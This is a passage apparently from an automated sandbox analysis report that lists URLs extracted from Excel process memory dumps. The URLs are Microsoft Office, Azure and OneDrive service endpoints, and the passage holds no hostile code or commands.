    Source: EXCEL.EXE, 00000001.00000003.734048144.00000000130A4000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.598123614.00000000130A4000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.734991130.00000000130A4000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.281163989.00000000130E8000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.285622692.00000000130A4000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.560788161.00000000130A4000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000002.751938211.00000000130A4000.00000004.00000001.sdmpString found in binary or memory: https://login.windows.net/common/oauth2/authorizes
    Source: EXCEL.EXE, 00000001.00000003.734048144.00000000130A4000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.598123614.00000000130A4000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.734991130.00000000130A4000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.281163989.00000000130E8000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.285622692.00000000130A4000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.560788161.00000000130A4000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000002.751938211.00000000130A4000.00000004.00000001.sdmpString found in binary or memory: https://login.windows.net/common/oauth2/authorizexEgj
    Source: EXCEL.EXE, 00000001.00000002.751491365.0000000012F2A000.00000004.00000001.sdmpString found in binary or memory: https://login.windows.net/common/oauth2/authorizez
    Source: EXCEL.EXE, 00000001.00000002.751491365.0000000012F2A000.00000004.00000001.sdmpString found in binary or memory: https://login.windows.net/common/oauth2/authorize~
    Source: EXCEL.EXE, 00000001.00000003.734048144.00000000130A4000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.598123614.00000000130A4000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.734991130.00000000130A4000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.281163989.00000000130E8000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.285622692.00000000130A4000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.560788161.00000000130A4000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000002.751938211.00000000130A4000.00000004.00000001.sdmpString found in binary or memory: https://login.windows.net/common/oauth2/authorize~Oml
    Source: EXCEL.EXE, 00000001.00000003.734048144.00000000130A4000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.598123614.00000000130A4000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.281017203.0000000012F8B000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.734991130.00000000130A4000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.281163989.00000000130E8000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.285622692.00000000130A4000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.560788161.00000000130A4000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000002.751938211.00000000130A4000.00000004.00000001.sdmp, 1C879995-8362-47D0-A5BB-F2EF376F1B92.1.drString found in binary or memory: https://loki.delve.office.com/api/v1/configuration/officewin32/
    Source: EXCEL.EXE, 00000001.00000003.734048144.00000000130A4000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.598123614.00000000130A4000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.281017203.0000000012F8B000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.734991130.00000000130A4000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.281163989.00000000130E8000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.285622692.00000000130A4000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.560788161.00000000130A4000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000002.751938211.00000000130A4000.00000004.00000001.sdmp, 1C879995-8362-47D0-A5BB-F2EF376F1B92.1.drString found in binary or memory: https://lookup.onenote.com/lookup/geolocation/v1
    Source: EXCEL.EXE, 00000001.00000003.281133390.00000000130A4000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.281266817.00000000130B7000.00000004.00000001.sdmpString found in binary or memory: https://lookup.onenote.com/lookup/geolocation/v1MBI_SSL_SHORT
    Source: EXCEL.EXE, 00000001.00000003.281017203.0000000012F8B000.00000004.00000001.sdmp, 1C879995-8362-47D0-A5BB-F2EF376F1B92.1.drString found in binary or memory: https://management.azure.com
    Source: EXCEL.EXE, 00000001.00000003.734048144.00000000130A4000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.598123614.00000000130A4000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.281017203.0000000012F8B000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.734991130.00000000130A4000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.281163989.00000000130E8000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.285622692.00000000130A4000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.560788161.00000000130A4000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000002.751938211.00000000130A4000.00000004.00000001.sdmp, 1C879995-8362-47D0-A5BB-F2EF376F1B92.1.drString found in binary or memory: https://management.azure.com/
    Source: EXCEL.EXE, 00000001.00000003.281285341.00000000130A5000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.281133390.00000000130A4000.00000004.00000001.sdmpString found in binary or memory: https://management.azure.com/BingGeospatialEndpointServiceUrlhttps://dev.virtualearth.net/REST/V1/Ge
    Source: EXCEL.EXE, 00000001.00000003.734048144.00000000130A4000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.598123614.00000000130A4000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.734991130.00000000130A4000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.281163989.00000000130E8000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.285622692.00000000130A4000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.560788161.00000000130A4000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000002.751938211.00000000130A4000.00000004.00000001.sdmpString found in binary or memory: https://management.azure.comw
    Source: EXCEL.EXE, 00000001.00000002.751938211.00000000130A4000.00000004.00000001.sdmp, 1C879995-8362-47D0-A5BB-F2EF376F1B92.1.drString found in binary or memory: https://messaging.office.com/
    Source: EXCEL.EXE, 00000001.00000003.734048144.00000000130A4000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.598123614.00000000130A4000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.281017203.0000000012F8B000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.734991130.00000000130A4000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.281163989.00000000130E8000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.285622692.00000000130A4000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.560788161.00000000130A4000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000002.751938211.00000000130A4000.00000004.00000001.sdmp, 1C879995-8362-47D0-A5BB-F2EF376F1B92.1.drString found in binary or memory: https://metadata.templates.cdn.office.net/client/log
    Source: EXCEL.EXE, 00000001.00000003.734048144.00000000130A4000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.598123614.00000000130A4000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.281017203.0000000012F8B000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.734991130.00000000130A4000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.281163989.00000000130E8000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.285622692.00000000130A4000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.560788161.00000000130A4000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000002.751938211.00000000130A4000.00000004.00000001.sdmp, 1C879995-8362-47D0-A5BB-F2EF376F1B92.1.drString found in binary or memory: https://na01.oscs.protection.outlook.com/api/SafeLinksApi/GetPolicy
    Source: EXCEL.EXE, 00000001.00000003.281278632.00000000130AB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.281133390.00000000130A4000.00000004.00000001.sdmpString found in binary or memory: https://na01.oscs.protection.outlook.com/api/SafeLinksApi/GetPolicyBearer
    Source: EXCEL.EXE, 00000001.00000003.734048144.00000000130A4000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.598123614.00000000130A4000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.281017203.0000000012F8B000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.734991130.00000000130A4000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.281163989.00000000130E8000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.285622692.00000000130A4000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.560788161.00000000130A4000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000002.751938211.00000000130A4000.00000004.00000001.sdmp, 1C879995-8362-47D0-A5BB-F2EF376F1B92.1.drString found in binary or memory: https://nam.learningtools.onenote.com/learningtoolsapi/v2.0/getfreeformspeech
    Source: EXCEL.EXE, 00000001.00000003.281266817.00000000130B7000.00000004.00000001.sdmpString found in binary or memory: https://nam.learningtools.onenote.com/learningtoolsapi/v2.0/getfreeformspeechBearer
    Source: EXCEL.EXE, 00000001.00000003.734048144.00000000130A4000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.598123614.00000000130A4000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.734991130.00000000130A4000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.281163989.00000000130E8000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.285622692.00000000130A4000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.560788161.00000000130A4000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000002.751938211.00000000130A4000.00000004.00000001.sdmpString found in binary or memory: https://nam.learningtools.onenote.com/learningtoolsapi/v2.0/getfreeformspeechL
    Source: EXCEL.EXE, 00000001.00000003.734048144.00000000130A4000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.598123614.00000000130A4000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.281017203.0000000012F8B000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.734991130.00000000130A4000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.281163989.00000000130E8000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.285622692.00000000130A4000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.560788161.00000000130A4000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.281133390.00000000130A4000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.281266817.00000000130B7000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000002.751938211.00000000130A4000.00000004.00000001.sdmp, 1C879995-8362-47D0-A5BB-F2EF376F1B92.1.drString found in binary or memory: https://ncus.contentsync.
    Source: EXCEL.EXE, 00000001.00000003.281017203.0000000012F8B000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000002.750289125.000000000F510000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.281133390.00000000130A4000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.281266817.00000000130B7000.00000004.00000001.sdmp, 1C879995-8362-47D0-A5BB-F2EF376F1B92.1.drString found in binary or memory: https://ncus.pagecontentsync.
    Source: EXCEL.EXE, 00000001.00000003.287212938.0000000012FF0000.00000004.00000001.sdmpString found in binary or memory: https://nexus.officeapps.live.com/
    Source: EXCEL.EXE, 00000001.00000002.749371941.000000000D761000.00000004.00000001.sdmpString found in binary or memory: https://nexus.officeapps.live.com/config16/
    Source: EXCEL.EXE, 00000001.00000003.285622692.00000000130A4000.00000004.00000001.sdmpString found in binary or memory: https://nexus.officeapps.live.com/nexus/
    Source: EXCEL.EXE, 00000001.00000002.749371941.000000000D761000.00000004.00000001.sdmpString found in binary or memory: https://nexus.officeapps.live.com/nexus/rules
    Source: EXCEL.EXE, 00000001.00000003.287212938.0000000012FF0000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.561820513.0000000012FF4000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.285622692.00000000130A4000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000002.751400177.0000000012EC0000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.563282189.000000000F59F000.00000004.00000001.sdmpString found in binary or memory: https://nexus.officeapps.live.com/nexus/rules?Application=excel.exe&Version=16.0.4954.1000&ClientId=
    Source: EXCEL.EXE, 00000001.00000003.285622692.00000000130A4000.00000004.00000001.sdmpString found in binary or memory: https://nexus.officeapps.live.comCF8
    Source: EXCEL.EXE, 00000001.00000003.281017203.0000000012F8B000.00000004.00000001.sdmp, 1C879995-8362-47D0-A5BB-F2EF376F1B92.1.drString found in binary or memory: https://o365auditrealtimeingestion.manage.office.com
    Source: EXCEL.EXE, 00000001.00000003.734048144.00000000130A4000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.598123614.00000000130A4000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.281017203.0000000012F8B000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.734991130.00000000130A4000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.281163989.00000000130E8000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.285622692.00000000130A4000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.560788161.00000000130A4000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000002.751938211.00000000130A4000.00000004.00000001.sdmp, 1C879995-8362-47D0-A5BB-F2EF376F1B92.1.drString found in binary or memory: https://o365auditrealtimeingestion.manage.office.com/api/userauditrecord
    Source: EXCEL.EXE, 00000001.00000003.281133390.00000000130A4000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.281266817.00000000130B7000.00000004.00000001.sdmpString found in binary or memory: https://o365auditrealtimeingestion.manage.office.com/api/userauditrecordhttps://login.windows.net/co
    Source: EXCEL.EXE, 00000001.00000003.281133390.00000000130A4000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.281266817.00000000130B7000.00000004.00000001.sdmpString found in binary or memory: https://o365auditrealtimeingestion.manage.office.comBearer
    Source: EXCEL.EXE, 00000001.00000003.734048144.00000000130A4000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.598123614.00000000130A4000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.734991130.00000000130A4000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.281163989.00000000130E8000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.285622692.00000000130A4000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.560788161.00000000130A4000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000002.751938211.00000000130A4000.00000004.00000001.sdmpString found in binary or memory: https://o365auditrealtimeingestion.manage.office.comGD
    Source: EXCEL.EXE, 00000001.00000003.734048144.00000000130A4000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.598123614.00000000130A4000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.281017203.0000000012F8B000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.734991130.00000000130A4000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.281163989.00000000130E8000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.285622692.00000000130A4000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.560788161.00000000130A4000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000002.751938211.00000000130A4000.00000004.00000001.sdmp, 1C879995-8362-47D0-A5BB-F2EF376F1B92.1.drString found in binary or memory: https://o365diagnosticsppe-web.cloudapp.net
    Source: EXCEL.EXE, 00000001.00000003.281017203.0000000012F8B000.00000004.00000001.sdmp, 1C879995-8362-47D0-A5BB-F2EF376F1B92.1.drString found in binary or memory: https://ocos-office365-s2s.msedge.net/ab
    Source: EXCEL.EXE, 00000001.00000003.734048144.00000000130A4000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.598123614.00000000130A4000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.734991130.00000000130A4000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.281163989.00000000130E8000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.285622692.00000000130A4000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.560788161.00000000130A4000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000002.751938211.00000000130A4000.00000004.00000001.sdmpString found in binary or memory: https://ocos-office365-s2s.msedge.net/abDY&nJ
    Source: EXCEL.EXE, 00000001.00000003.734048144.00000000130A4000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.598123614.00000000130A4000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.281017203.0000000012F8B000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.734991130.00000000130A4000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.281163989.00000000130E8000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.285622692.00000000130A4000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.560788161.00000000130A4000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000002.751938211.00000000130A4000.00000004.00000001.sdmp, 1C879995-8362-47D0-A5BB-F2EF376F1B92.1.drString found in binary or memory: https://ofcrecsvcapi-int.azurewebsites.net/
    Source: EXCEL.EXE, 00000001.00000002.751491365.0000000012F2A000.00000004.00000001.sdmp, 1C879995-8362-47D0-A5BB-F2EF376F1B92.1.drString found in binary or memory: https://officeapps.live.com
    Source: EXCEL.EXE, 00000001.00000002.751491365.0000000012F2A000.00000004.00000001.sdmpString found in binary or memory: https://officeapps.live.com%
    Source: EXCEL.EXE, 00000001.00000002.751491365.0000000012F2A000.00000004.00000001.sdmpString found in binary or memory: https://officeapps.live.com-
    Source: EXCEL.EXE, 00000001.00000002.751491365.0000000012F2A000.00000004.00000001.sdmpString found in binary or memory: https://officeapps.live.com1
    Source: EXCEL.EXE, 00000001.00000002.751491365.0000000012F2A000.00000004.00000001.sdmpString found in binary or memory: https://officeapps.live.com3
    Source: EXCEL.EXE, 00000001.00000002.751491365.0000000012F2A000.00000004.00000001.sdmpString found in binary or memory: https://officeapps.live.com7
    Source: EXCEL.EXE, 00000001.00000003.281163989.00000000130E8000.00000004.00000001.sdmpString found in binary or memory: https://officeapps.live.com82i
    Source: EXCEL.EXE, 00000001.00000002.751491365.0000000012F2A000.00000004.00000001.sdmpString found in binary or memory: https://officeapps.live.comC
    Source: EXCEL.EXE, 00000001.00000002.751491365.0000000012F2A000.00000004.00000001.sdmpString found in binary or memory: https://officeapps.live.comD
    Source: EXCEL.EXE, 00000001.00000002.751491365.0000000012F2A000.00000004.00000001.sdmpString found in binary or memory: https://officeapps.live.comG
    Source: EXCEL.EXE, 00000001.00000002.751491365.0000000012F2A000.00000004.00000001.sdmpString found in binary or memory: https://officeapps.live.comM
    Source: EXCEL.EXE, 00000001.00000002.751491365.0000000012F2A000.00000004.00000001.sdmpString found in binary or memory: https://officeapps.live.comS
    Source: EXCEL.EXE, 00000001.00000002.751491365.0000000012F2A000.00000004.00000001.sdmpString found in binary or memory: https://officeapps.live.comY
    Source: EXCEL.EXE, 00000001.00000002.751491365.0000000012F2A000.00000004.00000001.sdmpString found in binary or memory: https://officeapps.live.come
    Source: EXCEL.EXE, 00000001.00000002.751491365.0000000012F2A000.00000004.00000001.sdmpString found in binary or memory: https://officeapps.live.comk
    Source: EXCEL.EXE, 00000001.00000002.751491365.0000000012F2A000.00000004.00000001.sdmpString found in binary or memory: https://officeapps.live.como
    Source: EXCEL.EXE, 00000001.00000002.751491365.0000000012F2A000.00000004.00000001.sdmpString found in binary or memory: https://officeapps.live.comq
    Source: EXCEL.EXE, 00000001.00000003.281163989.00000000130E8000.00000004.00000001.sdmpString found in binary or memory: https://officeapps.live.comrr
    Source: EXCEL.EXE, 00000001.00000002.751491365.0000000012F2A000.00000004.00000001.sdmpString found in binary or memory: https://officeapps.live.comu
    Source: EXCEL.EXE, 00000001.00000003.281017203.0000000012F8B000.00000004.00000001.sdmp, 1C879995-8362-47D0-A5BB-F2EF376F1B92.1.drString found in binary or memory: https://officeci.azurewebsites.net/api/
    Source: EXCEL.EXE, 00000001.00000003.734048144.00000000130A4000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.598123614.00000000130A4000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.734991130.00000000130A4000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.281163989.00000000130E8000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.285622692.00000000130A4000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.560788161.00000000130A4000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000002.751938211.00000000130A4000.00000004.00000001.sdmpString found in binary or memory: https://officeci.azurewebsites.net/api/$
    Source: EXCEL.EXE, 00000001.00000003.734048144.00000000130A4000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.598123614.00000000130A4000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.281017203.0000000012F8B000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.734991130.00000000130A4000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.281163989.00000000130E8000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.285622692.00000000130A4000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.560788161.00000000130A4000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000002.751938211.00000000130A4000.00000004.00000001.sdmp, 1C879995-8362-47D0-A5BB-F2EF376F1B92.1.drString found in binary or memory: https://officemobile.uservoice.com/forums/929800-office-app-ios-and-ipad-asks
    Source: EXCEL.EXE, 00000001.00000003.734048144.00000000130A4000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.598123614.00000000130A4000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.281017203.0000000012F8B000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.734991130.00000000130A4000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.281163989.00000000130E8000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.285622692.00000000130A4000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.560788161.00000000130A4000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000002.751938211.00000000130A4000.00000004.00000001.sdmp, 1C879995-8362-47D0-A5BB-F2EF376F1B92.1.drString found in binary or memory: https://officesetup.getmicrosoftkey.com
    Source: EXCEL.EXE, 00000001.00000003.734048144.00000000130A4000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.598123614.00000000130A4000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.281017203.0000000012F8B000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.734991130.00000000130A4000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.281163989.00000000130E8000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.285622692.00000000130A4000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.560788161.00000000130A4000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000002.751938211.00000000130A4000.00000004.00000001.sdmp, 1C879995-8362-47D0-A5BB-F2EF376F1B92.1.drString found in binary or memory: https://ogma.osi.office.net/TradukoApi/api/v1.0/
    Source: EXCEL.EXE, 00000001.00000003.285622692.00000000130A4000.00000004.00000001.sdmpString found in binary or memory: https://omex.cdn.o
    Source: EXCEL.EXE, 00000001.00000003.734048144.00000000130A4000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.598123614.00000000130A4000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.281017203.0000000012F8B000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.734991130.00000000130A4000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.281163989.00000000130E8000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.285622692.00000000130A4000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.560788161.00000000130A4000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000002.751938211.00000000130A4000.00000004.00000001.sdmp, 1C879995-8362-47D0-A5BB-F2EF376F1B92.1.drString found in binary or memory: https://omex.cdn.office.net/addinclassifier/officeentities
    Source: EXCEL.EXE, 00000001.00000003.281589453.00000000130A4000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.281133390.00000000130A4000.00000004.00000001.sdmpString found in binary or memory: https://omex.cdn.office.net/addinclassifier/officeentitiesOfficeAddInClassifierOfficeEntitiesUpdated
    Source: EXCEL.EXE, 00000001.00000003.281017203.0000000012F8B000.00000004.00000001.sdmp, 1C879995-8362-47D0-A5BB-F2EF376F1B92.1.drString found in binary or memory: https://omex.cdn.office.net/addinclassifier/officeentitiesupdated
    Source: EXCEL.EXE, 00000001.00000002.751491365.0000000012F2A000.00000004.00000001.sdmpString found in binary or memory: https://omex.cdn.office.net/addinclassifier/officeentitiesupdatede
    Source: EXCEL.EXE, 00000001.00000003.281017203.0000000012F8B000.00000004.00000001.sdmp, 1C879995-8362-47D0-A5BB-F2EF376F1B92.1.drString found in binary or memory: https://omex.cdn.office.net/addinclassifier/officesharedentities
    Source: EXCEL.EXE, 00000001.00000002.751491365.0000000012F2A000.00000004.00000001.sdmpString found in binary or memory: https://omex.cdn.office.net/addinclassifier/officesharedentities2
    Source: EXCEL.EXE, 00000001.00000003.281017203.0000000012F8B000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000002.751491365.0000000012F2A000.00000004.00000001.sdmp, 1C879995-8362-47D0-A5BB-F2EF376F1B92.1.drString found in binary or memory: https://omex.cdn.office.net/addinclassifier/officesharedentitiesupdated
    Source: 1C879995-8362-47D0-A5BB-F2EF376F1B92.1.drString found in binary or memory: https://onedrive.live.com
    Source: EXCEL.EXE, 00000001.00000003.281017203.0000000012F8B000.00000004.00000001.sdmp, 1C879995-8362-47D0-A5BB-F2EF376F1B92.1.drString found in binary or memory: https://onedrive.live.com/about/download/?windows10SyncClientInstalled=false
    Source: EXCEL.EXE, 00000001.00000003.734048144.00000000130A4000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.598123614.00000000130A4000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.734991130.00000000130A4000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.281163989.00000000130E8000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.285622692.00000000130A4000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.560788161.00000000130A4000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000002.751938211.00000000130A4000.00000004.00000001.sdmpString found in binary or memory: https://onedrive.live.com/about/download/?windows10SyncClientInstalled=falseY
    Source: EXCEL.EXE, 00000001.00000003.281017203.0000000012F8B000.00000004.00000001.sdmp, 1C879995-8362-47D0-A5BB-F2EF376F1B92.1.drString found in binary or memory: https://onedrive.live.com/embed?
    Source: EXCEL.EXE, 00000001.00000003.734048144.00000000130A4000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.598123614.00000000130A4000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.734991130.00000000130A4000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.281163989.00000000130E8000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.285622692.00000000130A4000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.560788161.00000000130A4000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000002.751938211.00000000130A4000.00000004.00000001.sdmpString found in binary or memory: https://onedrive.live.com/embed?/
    Source: EXCEL.EXE, 00000001.00000002.751491365.0000000012F2A000.00000004.00000001.sdmpString found in binary or memory: https://onedrive.live.comed
    Source: EXCEL.EXE, 00000001.00000002.751938211.00000000130A4000.00000004.00000001.sdmp, 1C879995-8362-47D0-A5BB-F2EF376F1B92.1.drString found in binary or memory: https://osi.office.net
    Source: EXCEL.EXE, 00000001.00000003.734048144.00000000130A4000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.598123614.00000000130A4000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.734991130.00000000130A4000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.281163989.00000000130E8000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.285622692.00000000130A4000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.560788161.00000000130A4000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000002.751938211.00000000130A4000.00000004.00000001.sdmpString found in binary or memory: https://osi.office.net#
